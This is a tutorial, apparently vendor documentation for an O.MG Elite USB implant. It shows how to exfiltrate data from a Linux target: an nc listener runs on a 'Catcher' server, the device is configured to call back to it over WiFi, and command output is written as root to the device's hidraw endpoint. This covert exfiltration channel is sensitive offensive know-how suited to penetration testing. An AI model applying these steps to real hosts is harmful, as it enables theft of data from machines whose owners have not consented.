HIDX StealthLink Linux Exfil
What you will need:
- A Linux "Catcher" server running
nc. - A Linux "Target" host.
- A O.MG Elite Device running the the latest v3 Firmware.
- A Wireless Network accessible to both the O.MG Device and Linux "Catcher" server.
-
Please ensure that you have a Linux server with
ncinstalled, and connected to your network. This will serve as our "Catcher" server. You will need to have a minimal understanding of Linux and the Terminal. -
Please note the IP Address of your Linux server, as you will need this later in Step 3. You can get this via the command:
ip addr list -
Verify that your Linux server has nc installed, via the command:
nc --version -
If your Linux server does not yet have nc installed, you may be able to install it via the command:
sudo apt install -y netcat-traditional(Note: If this does not work, please review how to install software on your choice of Linux distribution. Alternative package that can be installed on most distros is
nc, subsitutencwithncatif that is needed.) -
You may now start the server, via the command:
nc -kvl 0.0.0.0 1234 -
You should now see the following message to show the server has started:
Listening on 0.0.0.0 1234 -
Later in Step 3, after the O.MG Device connects to your "Catcher" server, you should one of the two following messages:
Connection from 192.168.2.24:53856.or
Connection received on 192.168.2.24 53856Either message indicate a successful connection.
Please ensure that you have an O.MG Elite Device running the the latest v3 Firmware. If you are not sure, please update your O.MG Device via the WebFlasher.
Connect to the WebUI of the O.MG Elite device, and click on the About button in the header bar of the page and ensure you see "Elite" in the about page.
First, you should configure your HIDX Settings.
Within the O.MG WebUI Header Bar, click on the Settings button, and then the USB button beneath.
Within the section: HIDX Settings:
- Enter the Linux "Catcher" server IP Address obtained in
Step 2 - Enter the Server Port Number:
1234 - Click on the
HIDX AutoStart on Bootbutton - Click
Change Settings
You should configure your O.MG Device to connect via Station Mode to your Wireless Network.
- Within the Settings Menu, click on the NET button.
- Change the WiFi Mode to Station.
- Enter your Wireless Network's SSID and Password.
- Click "Change Settings"
Your O.MG Device will now reboot, and will attempt to join your Wireless Network. At this point, on the Linux "Catcher" server, you should see a message in your Terminal similar to this:
Client connected from: 192.168.1.151:9134
For this step, we will manually setup the Target Host to get a feel for how everything should work. Later, we will automate this process with a payload.
For this tutorial we'll be using Ubuntu 22.04, all actions need to be preformed as root.
-
Open Terminal
-
If not already logged in as root do
sudo -i -
Find the HID Device on Linux In order to find the HID device run the following command:
dmesg|grep -i "D3C0:D34D" |grep hiddev|grep hidraw|tail -n1|sed -e "s/.*hidraw/hidraw/g" -e "s/:.*//g"
(Note: You must know the Vendor ID and Product ID. This command utilizes the default Vendor and Product IDs. Adjust if needed.)
If successful, this should result in something similar to the output below:
hidraw3
Use this endpoint in the next step...
- Write data to the endpoint
ls > /dev/hidraw3This will not return any messages if successful.
Go back to the Linux "Catcher" server, and the terminal window.
You should now see the following:
Connection received on 192.168.2.24 53856
1.txt
2.txt